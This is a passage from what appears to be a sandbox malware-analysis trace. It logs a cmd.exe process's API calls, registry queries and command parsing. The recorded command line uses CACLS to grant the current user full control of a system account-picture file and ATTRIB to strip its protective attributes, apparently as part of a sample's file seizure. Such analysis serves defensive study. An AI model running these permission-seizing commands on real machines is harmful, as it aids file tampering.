"c:\\windows\\system32\\imm32.dll") Region: id = 24473 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 24474 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 24475 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 24476 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 24477 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 24478 start_va = 0x4e0000 end_va = 0x5e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 24479 start_va = 0x5f0000 end_va = 0x11effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 24480 start_va = 0x11f0000 end_va = 0x1352fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" filename = "" Region: id = 24510 start_va = 0x1360000 end_va = 0x162efff entry_point = 0x1360000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 428 os_tid = 0xb74 [0176.915] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24faac | out: lpSystemTimeAsFileTime=0x24faac*(dwLowDateTime=0x9f3d5ae0, dwHighDateTime=0x1d440a9)) [0176.915] GetCurrentProcessId () returned 0xa5c [0176.915] GetCurrentThreadId () returned 0xb74 [0176.915] GetTickCount () returned 0x334d5 [0176.915] QueryPerformanceCounter (in: lpPerformanceCount=0x24faa4 | out: lpPerformanceCount=0x24faa4*=23370457505) returned 1 [0176.916] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0176.916] __set_app_type (_Type=0x1) [0176.916] __p__fmode () returned 0x76b331f4 [0176.916] __p__commode () returned 0x76b331fc [0176.916] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0176.916] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0176.917] GetCurrentThreadId () returned 0xb74 [0176.917] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb74) returned 0x38 [0176.917] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0176.917] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0176.917] SetThreadUILanguage (LangId=0x0) returned 0x409 [0176.917] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0176.917] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fa3c | out: phkResult=0x24fa3c*=0x0) returned 0x2 [0176.917] VirtualQuery (in: lpAddress=0x24fa73, lpBuffer=0x24fa0c, dwLength=0x1c | out: lpBuffer=0x24fa0c*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0176.917] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24fa0c, dwLength=0x1c | out: lpBuffer=0x24fa0c*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0176.917] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fa0c, dwLength=0x1c | out: lpBuffer=0x24fa0c*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0176.917] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24fa0c, dwLength=0x1c | out: lpBuffer=0x24fa0c*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0176.917] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24fa0c, dwLength=0x1c | out: lpBuffer=0x24fa0c*(BaseAddress=0x250000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0176.917] GetConsoleOutputCP () returned 0x1b5 [0176.917] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0176.917] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0176.918] _get_osfhandle (_FileHandle=1) returned 0x7 [0176.918] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0176.918] _get_osfhandle (_FileHandle=1) returned 0x7 [0176.918] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0176.918] _get_osfhandle (_FileHandle=1) returned 0x7 [0176.918] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0176.918] _get_osfhandle (_FileHandle=0) returned 0x3 [0176.918] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0176.918] _get_osfhandle (_FileHandle=0) returned 0x3 [0176.918] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0176.919] GetEnvironmentStringsW () returned 0x3f0308* [0176.919] FreeEnvironmentStringsW (penv=0x3f0308) returned 1 [0176.919] GetEnvironmentStringsW () returned 0x3f0308* [0176.919] FreeEnvironmentStringsW (penv=0x3f0308) returned 1 [0176.919] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e9ac | out: phkResult=0x24e9ac*=0x40) returned 0x0 [0176.919] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e9b4, lpData=0x24e9b8, lpcbData=0x24e9b0*=0x1000 | out: lpType=0x24e9b4*=0x0, lpData=0x24e9b8*=0xb8, lpcbData=0x24e9b0*=0x1000) returned 0x2 [0176.919] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e9b4, lpData=0x24e9b8, lpcbData=0x24e9b0*=0x1000 | out: lpType=0x24e9b4*=0x4, lpData=0x24e9b8*=0x1, lpcbData=0x24e9b0*=0x4) returned 0x0 [0176.919] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e9b4, lpData=0x24e9b8, lpcbData=0x24e9b0*=0x1000 | out: lpType=0x24e9b4*=0x0, lpData=0x24e9b8*=0x1, lpcbData=0x24e9b0*=0x1000) returned 0x2 [0176.919] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e9b4, lpData=0x24e9b8, lpcbData=0x24e9b0*=0x1000 | out: lpType=0x24e9b4*=0x4, lpData=0x24e9b8*=0x0, lpcbData=0x24e9b0*=0x4) returned 0x0 [0176.919] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e9b4, lpData=0x24e9b8, lpcbData=0x24e9b0*=0x1000 | out: lpType=0x24e9b4*=0x4, lpData=0x24e9b8*=0x40, lpcbData=0x24e9b0*=0x4) returned 0x0 [0176.919] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e9b4, lpData=0x24e9b8, lpcbData=0x24e9b0*=0x1000 | out: lpType=0x24e9b4*=0x4, lpData=0x24e9b8*=0x40, lpcbData=0x24e9b0*=0x4) returned 0x0 [0176.919] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e9b4, lpData=0x24e9b8, lpcbData=0x24e9b0*=0x1000 | out: lpType=0x24e9b4*=0x0, lpData=0x24e9b8*=0x40, lpcbData=0x24e9b0*=0x1000) returned 0x2 [0176.919] RegCloseKey (hKey=0x40) returned 0x0 [0176.919] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e9ac | out: phkResult=0x24e9ac*=0x40) returned 0x0 [0176.919] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e9b4, lpData=0x24e9b8, lpcbData=0x24e9b0*=0x1000 | out: lpType=0x24e9b4*=0x0, lpData=0x24e9b8*=0x40, lpcbData=0x24e9b0*=0x1000) returned 0x2 [0176.920] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e9b4, lpData=0x24e9b8, lpcbData=0x24e9b0*=0x1000 | out: lpType=0x24e9b4*=0x4, lpData=0x24e9b8*=0x1, lpcbData=0x24e9b0*=0x4) returned 0x0 [0176.920] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e9b4, lpData=0x24e9b8, lpcbData=0x24e9b0*=0x1000 | out: lpType=0x24e9b4*=0x0, lpData=0x24e9b8*=0x1, lpcbData=0x24e9b0*=0x1000) returned 0x2 [0176.920] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e9b4, lpData=0x24e9b8, lpcbData=0x24e9b0*=0x1000 | out: lpType=0x24e9b4*=0x4, lpData=0x24e9b8*=0x0, lpcbData=0x24e9b0*=0x4) returned 0x0 [0176.920] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e9b4, lpData=0x24e9b8, lpcbData=0x24e9b0*=0x1000 | out: lpType=0x24e9b4*=0x4, lpData=0x24e9b8*=0x9, lpcbData=0x24e9b0*=0x4) returned 0x0 [0176.920] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e9b4, lpData=0x24e9b8, lpcbData=0x24e9b0*=0x1000 | out: lpType=0x24e9b4*=0x4, lpData=0x24e9b8*=0x9, lpcbData=0x24e9b0*=0x4) returned 0x0 [0176.920] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e9b4, lpData=0x24e9b8, lpcbData=0x24e9b0*=0x1000 | out: lpType=0x24e9b4*=0x0, lpData=0x24e9b8*=0x9, lpcbData=0x24e9b0*=0x1000) returned 0x2 [0176.920] RegCloseKey (hKey=0x40) returned 0x0 [0176.920] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88638c [0176.920] srand (_Seed=0x5b88638c) [0176.920] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\"" [0176.920] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\"" [0176.920] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0176.920] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3f1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0176.921] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0176.921] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0176.921] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0176.921] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0176.921] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0176.921] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0176.921] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0176.921] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0176.921] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0176.921] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0176.921] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0176.921] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0176.921] GetEnvironmentStringsW () returned 0x3f2458* [0176.921] FreeEnvironmentStringsW (penv=0x3f2458) returned 1 [0176.921] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0176.921] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0176.921] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0176.921] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0176.921] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0176.921] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0176.921] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0176.921] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0176.921] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0176.921] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0176.921] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f778 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0176.921] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24f778, lpFilePart=0x24f774 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f774*="Desktop") returned 0x18 [0176.921] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0176.922] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f4f4 | out: lpFindFileData=0x24f4f4) returned 0x3f0ae8 [0176.922] FindClose (in: hFindFile=0x3f0ae8 | out: hFindFile=0x3f0ae8) returned 1 [0176.922] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f4f4 | out: lpFindFileData=0x24f4f4) returned 0x3f0ae8 [0176.922] FindClose (in: hFindFile=0x3f0ae8 | out: hFindFile=0x3f0ae8) returned 1 [0176.922] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f4f4 | out: lpFindFileData=0x24f4f4) returned 0x3f0ae8 [0176.922] FindClose (in: hFindFile=0x3f0ae8 | out: hFindFile=0x3f0ae8) returned 1 [0176.922] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0176.922] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0176.922] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0176.922] GetEnvironmentStringsW () returned 0x3f0308* [0176.922] FreeEnvironmentStringsW (penv=0x3f0308) returned 1 [0176.922] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0176.923] GetConsoleOutputCP () returned 0x1b5 [0176.923] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0176.923] GetUserDefaultLCID () returned 0x409 [0176.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0176.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24f8b8, cchData=128 | out: lpLCData="0") returned 2 [0176.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24f8b8, cchData=128 | out: lpLCData="0") returned 2 [0176.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24f8b8, cchData=128 | out: lpLCData="1") returned 2 [0176.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0176.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0176.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0176.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0176.924] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0176.924] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0176.924] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0176.924] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0176.924] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0176.924] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0176.924] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0176.924] GetConsoleTitleW (in: lpConsoleTitle=0x3e09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0176.925] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0176.925] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0176.925] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0176.925] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0176.925] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0176.926] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0176.926] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0176.926] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0176.926] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0176.926] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0176.926] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0176.926] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0176.929] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0176.929] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0176.929] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0176.929] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0176.929] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0176.929] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0176.929] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0176.931] GetConsoleTitleW (in: lpConsoleTitle=0x24f54c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0177.015] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0177.015] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0177.015] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0177.015] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0177.015] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0177.015] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0177.015] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0177.015] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0177.015] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0177.015] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0177.015] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0177.015] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0177.015] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0177.016] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0177.016] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0177.016] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0177.016] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0177.016] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0177.016] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0177.016] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0177.016] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0177.016] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0177.016] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0177.016] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0177.016] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0177.016] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0177.016] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0177.016] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0177.016] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0177.016] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0177.016] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0177.016] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0177.016] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0177.016] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0177.016] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0177.016] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0177.016] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0177.016] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0177.016] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0177.016] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0177.016] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0177.016] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0177.016] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0177.016] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0177.016] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0177.016] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0177.016] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0177.016] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0177.016] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0177.016] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0177.016] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0177.016] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0177.016] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0177.016] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0177.016] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0177.016] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0177.016] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0177.016] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0177.016] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0177.016] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0177.017] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0177.017] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0177.017] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0177.017] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0177.017] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0177.017] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0177.017] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0177.017] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0177.017] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0177.017] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0177.017] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0177.017] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0177.017] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0177.017] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0177.017] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0177.017] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0177.017] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0177.017] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0177.017] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0177.017] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0177.017] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0177.017] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0177.017] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0177.017] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0177.017] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0177.017] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0177.017] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0177.017] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0177.018] SetErrorMode (uMode=0x0) returned 0x0 [0177.018] SetErrorMode (uMode=0x1) returned 0x0 [0177.018] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f1e98, lpFilePart=0x24f06c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f06c*="Desktop") returned 0x18 [0177.018] SetErrorMode (uMode=0x0) returned 0x1 [0177.018] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0177.018] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0177.023] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0177.023] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x24ede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ede8) returned 0xffffffff [0177.024] GetLastError () returned 0x2 [0177.024] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x24ede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ede8) returned 0xffffffff [0177.024] GetLastError () returned 0x2 [0177.024] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x24ede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ede8) returned 0x3f2180 [0177.024] FindClose (in: hFindFile=0x3f2180 | 